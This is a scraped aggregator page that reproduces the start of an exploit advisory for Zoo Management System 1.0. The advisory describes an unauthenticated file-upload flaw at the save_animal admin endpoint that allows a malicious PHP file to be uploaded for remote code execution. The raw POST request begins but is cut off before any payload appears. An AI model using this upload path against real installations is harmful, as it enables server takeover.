comparemela.com

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE# Date: 16.10.2023# Exploit Author: Çağatay Ceyhan# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database# Version: 1.0# Tested on: Windows 11## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1Host: localhostContent-Length: 6162Cache-Control: max-age=0sec-ch-ua: "Chromium";v="117",

Related Keywords

,Software Link ,Exploit Title ,Zoo Management System ,Exploit Author ,Vendor Homepage ,

© 2024 Vimarsana

comparemela.com © 2020. All Rights Reserved.